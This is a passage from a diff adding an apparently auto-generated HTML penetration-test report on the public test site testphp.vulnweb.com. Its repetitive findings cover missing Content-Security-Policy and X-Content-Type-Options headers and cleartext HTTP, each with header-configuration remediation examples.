+   - Set &#39;frame-ancestors&#39; to prevent clickjacking
+
+4. **Implementation Strategy**:
+   - Deploy CSP in report-only mode first using &#39;Content-Security-Policy-Report-Only&#39;
+   - Monitor violation reports to identify legitimate resources
+   - Gradually tighten policy and switch to enforcement mode
+   - Regularly review and update CSP directives as application changes
+
+5. **Additional Security Headers**: Implement complementary security headers:
+   - X-Frame-Options: DENY or SAMEORIGIN
+   - X-Content-Type-Options: nosniff
+   - Referrer-Policy: strict-origin-when-cross-origin
+   - Permissions-Policy for feature control</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/Mod_Rewrite_Shop/</p>
+                    <p><strong>Description:</strong> The application at http://testphp.vulnweb.com/Mod_Rewrite_Shop/ is missing the X-Content-Type-Options security header. This header was introduced to prevent MIME type confusion attacks by instructing browsers to strictly adhere to the MIME type specified in the Content-Type header rather than performing content sniffing. Without this header, browsers may attempt to guess the content type of responses based on the content itself, potentially leading to security vulnerabilities.
+
+During testing, HTTP responses from the affected endpoint were observed to lack the &#39;X-Content-Type-Options: nosniff&#39; header. This configuration allows browsers to perform MIME sniffing, which can be exploited by attackers to bypass security controls. For example, an attacker could upload a file with a benign extension but malicious content, and if the browser misinterprets the MIME type, it could execute the malicious content in an unintended context.
+
+The vulnerability was identified through automated security header analysis during the penetration test, where the absence of this critical security header was flagged as a potential security risk that could facilitate more sophisticated attacks against application users.</p>
+                    <p><strong>Impact:</strong> The primary risk associated with missing X-Content-Type-Options header is the potential for MIME type confusion attacks. Attackers could exploit this to bypass content security policies, execute malicious scripts in unexpected contexts, or facilitate cross-site scripting (XSS) attacks. In scenarios where user-generated content is served, attackers might upload files with misleading extensions that browsers incorrectly interpret as executable content.
+
+The business impact includes potential compromise of user sessions, unauthorized access to sensitive data, and reputation damage from successful attacks. While this vulnerability alone may not lead to immediate system compromise, it significantly reduces the application&#39;s defense-in-depth posture and can be chained with other vulnerabilities to amplify attack impact. Organizations in regulated industries may face compliance violations, as security header implementation is often required by standards such as PCI-DSS for applications handling payment data.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Configure the web server or application to include the &#39;X-Content-Type-Options: nosniff&#39; header in all HTTP responses. This can be implemented at various levels:
+
+   **Apache Configuration (.htaccess or virtual host):**
+   ```apache
+   Header always set X-Content-Type-Options &quot;nosniff&quot;
+   ```
+
+   **Nginx Configuration:**
+   ```nginx
+   add_header X-Content-Type-Options &quot;nosniff&quot; always;
+   ```
+
+   **Application-Level (PHP example):**
+   ```php
+   header(&#39;X-Content-Type-Options: nosniff&#39;);
+   ```
+
+2. **Implement Comprehensive Security Headers**: Deploy additional security headers as part of a defense-in-depth strategy, including Content-Security-Policy, X-Frame-Options, and Strict-Transport-Security headers.
+
+3. **Content-Type Validation**: Ensure all responses include appropriate Content-Type headers that accurately reflect the content being served. Implement server-side validation of file uploads and content types.
+
+4. **Regular Security Header Audits**: Establish automated testing to verify the presence and correct configuration of security headers across all application endpoints. Consider using tools like SecurityHeaders.com or integrating header checks into CI/CD pipelines.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/Mod_Rewrite_Shop/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/Mod_Rewrite_Shop/ lacks a Content Security Policy (CSP) header implementation. During the assessment, HTTP response analysis revealed the complete absence of the &#39;Content-Security-Policy&#39; header in server responses. This security control omission was identified through automated header analysis and manual verification of multiple endpoints within the application.
+
+Content Security Policy is a critical browser security mechanism that helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks by declaring which dynamic resources are allowed to load. Without CSP implementation, the application cannot leverage this important defense-in-depth security layer, leaving users vulnerable to various client-side attacks. The missing CSP header indicates that the application has not implemented proper security headers configuration, which is a fundamental security hardening requirement.
+
+In the context of this e-commerce application (Mod_Rewrite_Shop), the absence of CSP is particularly concerning as such applications typically handle sensitive user data, payment information, and authentication credentials. The lack of CSP combined with potential XSS vulnerabilities could allow attackers to inject malicious scripts that execute with full privileges in the user&#39;s browser context.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy creates multiple attack vectors that could compromise user security and business operations. Attackers could exploit this weakness in conjunction with XSS vulnerabilities to inject malicious scripts that steal user credentials, session tokens, payment card information, or personal data. In an e-commerce context, this could lead to fraudulent transactions, account takeovers, and significant financial losses for both customers and the business.
+
+The most severe impact scenarios include: unauthorized access to customer accounts and payment information, injection of malicious content that could damage brand reputation, compliance violations under PCI-DSS requirements (which mandate secure transmission and processing of cardholder data), and potential GDPR violations if personal data is compromised. Additionally, the lack of CSP makes the application more susceptible to clickjacking attacks, where malicious sites could embed the application in hidden frames to trick users into performing unintended actions. From a business perspective, successful exploitation could result in regulatory fines, loss of customer trust, legal liability, and significant remediation costs.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Headers**: Configure the web server or application to include appropriate CSP headers in all HTTP responses. Start with a restrictive policy and gradually refine it based on application requirements. Example implementation:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Use CSP Report-Only Mode for Testing**: Before enforcing CSP, implement it in report-only mode to identify potential issues without breaking functionality:
+   ```
+   Content-Security-Policy-Report-Only: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+3. **Server-Level Configuration**: Implement CSP headers at the web server level (Apache, Nginx, IIS) to ensure consistent application across all endpoints. For Apache:
+   ```
+   Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot;
+   ```
+
+4. **Application-Level Implementation**: Add CSP headers programmatically in application code. For PHP applications:
+   ```php
+   header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;&quot;);
+   ```
+
+5. **Implement CSP Reporting**: Set up a reporting endpoint to monitor CSP violations and refine the policy over time. This helps identify legitimate resources that may be blocked and potential attack attempts.
+
+6. **Regular Policy Review**: Establish a process to regularly review and update CSP policies as application functionality evolves, ensuring the policy remains effective without hindering legitimate operations.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/hpp/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/hpp/ is missing the X-Content-Type-Options security header. This header is crucial for preventing MIME type sniffing attacks where browsers attempt to determine the content type of a resource by examining its content rather than relying solely on the Content-Type header provided by the server. During the security assessment, HTTP response headers were analyzed and the absence of &#39;X-Content-Type-Options: nosniff&#39; was confirmed.
+
+Without this header, malicious actors can exploit browser behavior by uploading files with misleading extensions or content types. For example, an attacker could upload a JavaScript file disguised as an image, and if the browser performs MIME sniffing, it may execute the malicious script instead of treating it as an image. This vulnerability is particularly concerning in applications that allow file uploads or serve user-generated content, as it can lead to cross-site scripting (XSS) attacks and other client-side code execution scenarios.
+
+The vulnerable endpoint demonstrates this security misconfiguration by not implementing proper HTTP security headers, leaving users susceptible to content type confusion attacks when interacting with the application.</p>
+                    <p><strong>Impact:</strong> The absence of the X-Content-Type-Options header exposes users to MIME type confusion attacks, which can lead to cross-site scripting (XSS) vulnerabilities and unauthorized script execution. Attackers could potentially upload malicious files disguised as benign content types, which browsers might then execute as JavaScript or other executable content. This could result in session hijacking, credential theft, defacement of the web application, or execution of malicious actions on behalf of authenticated users. In enterprise environments, this vulnerability could compromise user accounts, lead to data exfiltration, and damage the organization&#39;s reputation. From a compliance perspective, this security gap may violate requirements under frameworks such as PCI-DSS (which mandates secure coding practices), GDPR (regarding data protection by design), and various industry-specific regulations that require implementation of appropriate technical security measures.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Configure X-Content-Type-Options Header**: Add the following header to all HTTP responses: &#39;X-Content-Type-Options: nosniff&#39;. This can be implemented at the web server level (Apache/Nginx), application level, or through a Web Application Firewall (WAF).
+
+2. **Web Server Configuration Examples**:
+   - **Apache**: Add &#39;Header always set X-Content-Type-Options nosniff&#39; to httpd.conf or .htaccess
+   - **Nginx**: Add &#39;add_header X-Content-Type-Options nosniff always;&#39; to nginx.conf
+   - **IIS**: Add &#39;&lt;add name=&quot;X-Content-Type-Options&quot; value=&quot;nosniff&quot; /&gt;&#39; to web.config customHeaders section
+
+3. **Application-Level Implementation**: Ensure the application framework sets this header programmatically. For PHP applications, use: &#39;header(&quot;X-Content-Type-Options: nosniff&quot;);&#39;. For Node.js with Express: &#39;app.use(helmet.noSniff());&#39;
+
+4. **Implement Content Security Policy (CSP)**: Deploy a comprehensive CSP header to provide additional protection against XSS and code injection attacks: &#39;Content-Security-Policy: default-src \&#39;self\&#39;; script-src \&#39;self\&#39; \&#39;unsafe-inline\&#39;; object-src \&#39;none\&#39;;&#39;
+
+5. **Regular Security Header Audit**: Implement automated testing to verify the presence of all security headers across the application. Use tools like Security Headers (securityheaders.com) or integrate header validation into CI/CD pipelines.
+
+6. **File Upload Security**: If the application handles file uploads, implement strict file type validation, rename uploaded files, store them outside the web root, and serve them with appropriate Content-Type headers.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/hpp/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/hpp/ does not implement a Content Security Policy (CSP) header, as evidenced by the complete absence of the &#39;Content-Security-Policy&#39; directive in HTTP responses. CSP is a crucial security mechanism that helps prevent cross-site scripting (XSS), data injection attacks, and other code injection vulnerabilities by defining trusted sources for content execution and loading.
+
+Without CSP implementation, the application is vulnerable to various client-side attacks including XSS, clickjacking, and malicious content injection. Attackers can exploit this absence to inject and execute arbitrary JavaScript code, load malicious resources from external domains, or perform other client-side attacks that could compromise user data and application integrity. The lack of CSP represents a fundamental gap in the application&#39;s defense-in-depth security strategy.
+
+This vulnerability was identified through HTTP response analysis during security testing, where manual inspection and automated tools confirmed the complete absence of Content-Security-Policy headers across the application endpoints, including the specifically tested /hpp/ directory.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy significantly increases the application&#39;s attack surface and exposes users to multiple security risks. Attackers could exploit this gap to execute stored or reflected XSS attacks with greater success rates, as there are no browser-enforced restrictions on script execution or resource loading. This could lead to session hijacking, credential theft, unauthorized actions performed on behalf of users, and data exfiltration.
+
+From a business perspective, successful exploitation could result in customer data breaches, financial fraud, reputational damage, and potential regulatory violations. Organizations subject to compliance frameworks such as PCI-DSS, GDPR, or HIPAA may face additional scrutiny, as the absence of fundamental security controls like CSP demonstrates inadequate security posture. The lack of CSP also makes the application more susceptible to advanced persistent threats and targeted attacks that rely on client-side code execution.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Headers**: Configure the web server or application framework to include appropriate CSP headers in all HTTP responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Use CSP Report-Only Mode Initially**: Deploy CSP in report-only mode first to identify potential issues without breaking functionality:
+   ```
+   Content-Security-Policy-Report-Only: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+3. **Framework-Specific Implementation**: For PHP applications, add CSP headers using header() function or web server configuration:
+   ```php
+   // PHP implementation
+   header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;&quot;);
+   ```
+   
+   For Apache servers, add to .htaccess or virtual host configuration:
+   ```apache
+   Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;&quot;
+   ```
+
+4. **Implement CSP Monitoring**: Set up a reporting endpoint to monitor CSP violations and adjust policies accordingly. This helps identify legitimate resources that need to be whitelisted and potential attack attempts.
+
+5. **Regular Policy Review**: Establish a process to regularly review and update CSP policies as the application evolves, ensuring new features and third-party integrations are properly accommodated while maintaining security posture.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 3.7</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=1</p>
+                    <p><strong>Description:</strong> The application fails to implement the X-Content-Type-Options security header on the endpoint http://testphp.vulnweb.com/listproducts.php?cat=1. This header is designed to prevent MIME type sniffing attacks by instructing browsers to strictly interpret the declared Content-Type header rather than attempting to guess the content type based on the response body. Without this protection, browsers may interpret responses in unexpected ways, potentially leading to security vulnerabilities.
+
+MIME type sniffing (also known as content sniffing) occurs when browsers ignore the declared Content-Type and instead analyze the response content to determine how it should be processed. This behavior can be exploited by attackers who can control response content, allowing them to inject malicious scripts or content that gets executed in unintended contexts. The missing X-Content-Type-Options header leaves the application vulnerable to these attacks, particularly in scenarios where user-controlled content is reflected in responses.
+
+In the context of this PHP application, the absence of this security header means that if an attacker can influence the response content (through file uploads, user-generated content, or other input mechanisms), they may be able to craft responses that browsers will interpret as executable content despite being served with non-executable MIME types.</p>
+                    <p><strong>Impact:</strong> The missing X-Content-Type-Options header creates a medium-risk security exposure that could facilitate various client-side attacks. The primary risk involves MIME confusion attacks where malicious content disguised as benign file types (such as images or text files) could be interpreted and executed as JavaScript or HTML by browsers performing content sniffing. This could lead to cross-site scripting (XSS) attacks, particularly in applications that allow file uploads or serve user-controlled content.
+
+From a business perspective, successful exploitation could result in unauthorized access to user sessions, theft of sensitive information including authentication cookies and personal data, and potential compromise of user accounts. In e-commerce applications like the affected site, this could lead to unauthorized transactions, exposure of customer payment information, and significant reputational damage. The vulnerability may also impact compliance with security standards such as PCI-DSS, which requires adequate protection of cardholder data, and privacy regulations like GDPR that mandate appropriate technical safeguards for personal data processing.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Add the X-Content-Type-Options header with the value &#39;nosniff&#39; to all HTTP responses. In PHP applications, this can be implemented globally by adding the following code to a common header file or application bootstrap:
+
+```php
+header(&#39;X-Content-Type-Options: nosniff&#39;);
+```
+
+2. **Web Server Configuration**: Configure the web server to automatically add the header for all responses. For Apache, add the following to .htaccess or virtual host configuration:
+
+```apache
+Header always set X-Content-Type-Options &quot;nosniff&quot;
+```
+
+For Nginx, add this to the server block:
+
+```nginx
+add_header X-Content-Type-Options &quot;nosniff&quot; always;
+```
+
+3. **Framework-Level Implementation**: If using a PHP framework, implement the header through middleware or security configuration. For example, in Laravel, add it to the middleware or use the built-in security headers package.
+
+4. **Content Security Policy**: Implement a comprehensive Content Security Policy (CSP) as an additional layer of protection against content injection attacks. This works synergistically with X-Content-Type-Options to prevent various client-side attacks.
+
+5. **Input Validation and Output Encoding**: Ensure all user inputs are properly validated and outputs are encoded to prevent injection attacks that could be facilitated by MIME type confusion.
+
+6. **Regular Security Header Auditing**: Implement automated testing to verify that all security headers, including X-Content-Type-Options, are present on all application responses.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=1</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/listproducts.php?cat=1 lacks a Content Security Policy (CSP) header implementation. Content Security Policy is a critical security mechanism that helps prevent cross-site scripting (XSS) attacks, clickjacking, and other code injection attacks by controlling which resources the browser is allowed to load for a given page. During the security assessment, it was observed that the HTTP response headers do not include the &#39;Content-Security-Policy&#39; directive, leaving the application vulnerable to various client-side attacks.
+
+Without CSP implementation, the application cannot effectively mitigate XSS attacks, as there are no restrictions on inline scripts, external resource loading, or dynamic code execution. This creates a permissive environment where malicious scripts injected through other vulnerabilities (such as reflected or stored XSS) can execute without restriction. The absence of CSP represents a defense-in-depth failure that significantly increases the impact of any existing or future XSS vulnerabilities.
+
+The specific endpoint tested (listproducts.php) appears to be a product listing page that likely renders dynamic content, making it a prime candidate for XSS attacks if other input validation weaknesses exist. The lack of CSP means that any successful XSS payload would have unrestricted access to perform actions such as stealing cookies, accessing local storage, making arbitrary HTTP requests, or redirecting users to malicious sites.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy creates several significant security risks. Primarily, it amplifies the impact of any XSS vulnerabilities that may exist in the application by allowing unrestricted script execution, enabling attackers to steal session cookies, access sensitive user data, or perform actions on behalf of legitimate users. Without CSP, attackers can also conduct clickjacking attacks by embedding the application in malicious iframes, potentially tricking users into performing unintended actions.
+
+From a business perspective, successful exploitation could lead to account takeover, unauthorized transactions, data theft, and reputation damage. The vulnerability particularly affects user trust and could result in financial losses if customer data is compromised. Additionally, organizations subject to compliance requirements such as PCI-DSS (for payment processing) or GDPR (for EU user data) may face regulatory penalties, as CSP implementation is considered a security best practice for protecting user data and preventing unauthorized access to sensitive information.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Header**: Add a comprehensive CSP header to all web application responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;unsafe-eval&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39; https:; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Server Configuration**: Configure the web server to automatically include CSP headers. For Apache, add to .htaccess or virtual host configuration:
+   ```apache
+   Header always set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:;&quot;
+   ```
+   For Nginx:
+   ```nginx
+   add_header Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:;&quot; always;
+   ```
+
+3. **Application-Level Implementation**: If using PHP, add CSP headers programmatically:
+   ```php
+   header(&quot;Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:;&quot;);
+   ```
+
+4. **CSP Reporting**: Implement CSP violation reporting to monitor and refine the policy:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+5. **Gradual Implementation**: Start with &#39;Content-Security-Policy-Report-Only&#39; header to test the policy without breaking functionality, then transition to enforcing mode after validation.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 3.7</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/search.php?test=1</p>
+                    <p><strong>Description:</strong> The application is missing the X-Content-Type-Options security header at the endpoint http://testphp.vulnweb.com/search.php?test=1. This header prevents browsers from performing MIME type sniffing, which can lead to security vulnerabilities when browsers incorrectly interpret file types based on content rather than the declared Content-Type header. The absence of this header was confirmed through HTTP response analysis showing &#39;X-Content-Type-Options: Not set&#39;.
+
+Without the X-Content-Type-Options header set to &#39;nosniff&#39;, browsers may attempt to guess the MIME type of served content, potentially executing malicious scripts or interpreting files in unexpected ways. This is particularly dangerous when user-uploaded content is served or when the application handles various file types that could be misinterpreted by the browser.
+
+In the context of this search functionality, the missing header could allow attackers to exploit MIME confusion attacks, especially if the search results include user-controlled content or file downloads. This vulnerability becomes more critical when combined with file upload functionality or when serving dynamic content that could be manipulated by attackers.</p>
+                    <p><strong>Impact:</strong> The missing X-Content-Type-Options header could allow attackers to exploit MIME type confusion vulnerabilities, potentially leading to cross-site scripting (XSS) attacks through content sniffing. An attacker could upload or inject content that appears benign but is interpreted by browsers as executable JavaScript, bypassing content type restrictions. This could result in session hijacking, credential theft, or unauthorized actions performed on behalf of legitimate users.
+
+In enterprise environments, this vulnerability could facilitate targeted phishing attacks or malware distribution through seemingly legitimate file downloads. The impact is amplified in applications handling sensitive data or financial transactions, where successful exploitation could lead to data breaches or regulatory compliance violations under frameworks such as PCI-DSS, GDPR, or SOX. While not directly exposing data, this vulnerability creates an attack vector that can be chained with other vulnerabilities to achieve more significant compromise.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Add the following header to all HTTP responses: &#39;X-Content-Type-Options: nosniff&#39;. This can be implemented at the application level, web server configuration, or through a reverse proxy.
+
+2. **Web Server Configuration Examples**:
+   - **Apache**: Add &#39;Header always set X-Content-Type-Options nosniff&#39; to .htaccess or virtual host configuration
+   - **Nginx**: Add &#39;add_header X-Content-Type-Options nosniff always;&#39; to server block
+   - **IIS**: Add &#39;&lt;add name=&quot;X-Content-Type-Options&quot; value=&quot;nosniff&quot; /&gt;&#39; to web.config customHeaders section
+
+3. **Application-Level Implementation**: For PHP applications, add &#39;header(&#39;X-Content-Type-Options: nosniff&#39;);&#39; before any content output. Ensure this is implemented globally through a common header function or framework middleware.
+
+4. **Content Security Policy Enhancement**: Implement a comprehensive Content Security Policy (CSP) as an additional layer of protection against content injection attacks. Example: &#39;Content-Security-Policy: default-src \&#39;self\&#39;; script-src \&#39;self\&#39; \&#39;unsafe-inline\&#39;; object-src \&#39;none\&#39;;&#39;
+
+5. **Regular Security Header Audit**: Implement automated testing to verify the presence of all security headers across the application. Consider using tools like security header scanners in CI/CD pipelines to prevent regression.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/search.php?test=1</p>
+                    <p><strong>Description:</strong> The application at http://testphp.vulnweb.com/search.php?test=1 does not implement a Content Security Policy (CSP) header, as evidenced by the complete absence of the &#39;Content-Security-Policy&#39; header in HTTP responses. CSP is a critical browser security mechanism that helps prevent code injection attacks such as Cross-Site Scripting (XSS) by allowing web applications to specify which sources of content are considered trustworthy.
+
+Without CSP protection, the application is vulnerable to various client-side attacks where malicious scripts could be injected and executed within the context of the application. This creates an environment where attackers can more easily exploit other vulnerabilities like reflected or stored XSS, as there are no browser-level restrictions on script execution, inline styles, or resource loading from external domains.
+
+The missing CSP header represents a failure to implement defense-in-depth security controls, leaving users vulnerable to content injection attacks that could have been mitigated or prevented entirely with proper CSP implementation. This is particularly concerning for applications that handle user input or display user-generated content.</p>
+                    <p><strong>Impact:</strong> The absence of Content Security Policy creates several security risks that could lead to compromise of user data and application integrity. Attackers could more easily exploit XSS vulnerabilities to steal session cookies, perform actions on behalf of users, redirect users to malicious sites, or inject malicious content such as cryptocurrency miners or phishing forms. In the worst-case scenario, successful exploitation could lead to complete account takeover, theft of sensitive personal information, financial fraud, or malware distribution to application users.
+
+From a compliance perspective, the lack of adequate security controls may violate requirements under regulations such as PCI-DSS (which mandates protection against common web application vulnerabilities), GDPR (which requires appropriate technical measures to protect personal data), and various industry standards that require defense-in-depth security implementations. Organizations may face regulatory fines, loss of customer trust, and reputational damage if user data is compromised due to preventable client-side attacks.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Content Security Policy Headers**: Add a comprehensive CSP header to all HTTP responses. Start with a restrictive policy and gradually relax as needed:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-ancestors &#39;none&#39;;
+   ```
+
+2. **Configure Web Server Level**: Implement CSP at the web server level (Apache/Nginx) or application framework level to ensure consistent application across all pages:
+   - **Apache**: `Header always set Content-Security-Policy &quot;default-src &#39;self&#39;&quot;`
+   - **Nginx**: `add_header Content-Security-Policy &quot;default-src &#39;self&#39;&quot; always;`
+   - **PHP**: `header(&quot;Content-Security-Policy: default-src &#39;self&#39;&quot;);`
+
+3. **Implement CSP Reporting**: Use CSP reporting to monitor policy violations and identify potential attacks:
+   ```
+   Content-Security-Policy: default-src &#39;self&#39;; report-uri /csp-report-endpoint
+   ```
+
+4. **Gradual Implementation**: Start with `Content-Security-Policy-Report-Only` header to test policies without breaking functionality, then transition to enforcement mode.
+
+5. **Regular Policy Review**: Regularly review and update CSP policies to ensure they remain effective while supporting legitimate application functionality. Use tools like CSP Evaluator to validate policy effectiveness.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Cleartext HTTP Transmission</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> cleartext_transmission</span>
+                    <span><strong>CWE:</strong> CWE-319</span>
+                    <span><strong>CVSS:</strong> 5.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> The application transmits sensitive data over unencrypted HTTP connections without providing an HTTPS alternative. During testing, it was confirmed that the web application at http://testphp.vulnweb.com/ exclusively operates over HTTP protocol, with no secure HTTPS endpoint available for users or automated systems to establish encrypted communications.
+
+This vulnerability allows network-positioned attackers to intercept, modify, and replay HTTP traffic between clients and the server. All data transmitted through forms, authentication mechanisms, session tokens, and application responses are sent in cleartext format, making them vulnerable to eavesdropping attacks through packet sniffing, man-in-the-middle attacks, or network infrastructure compromises.
+
+The absence of transport layer security affects all functionality within the application, including potentially sensitive operations such as user authentication, data submission, and session management. This creates a fundamental security weakness that undermines any application-level security controls implemented within the web application.</p>
+                    <p><strong>Impact:</strong> An attacker positioned on the network path between users and the server could intercept all communications, including usernames, passwords, session tokens, personal information, and business data transmitted through the application. This could lead to account takeover, identity theft, unauthorized access to sensitive business information, and complete compromise of user privacy. The cleartext transmission vulnerability enables various attack scenarios including session hijacking, credential harvesting, and data manipulation attacks where attackers could modify requests and responses in transit.
+
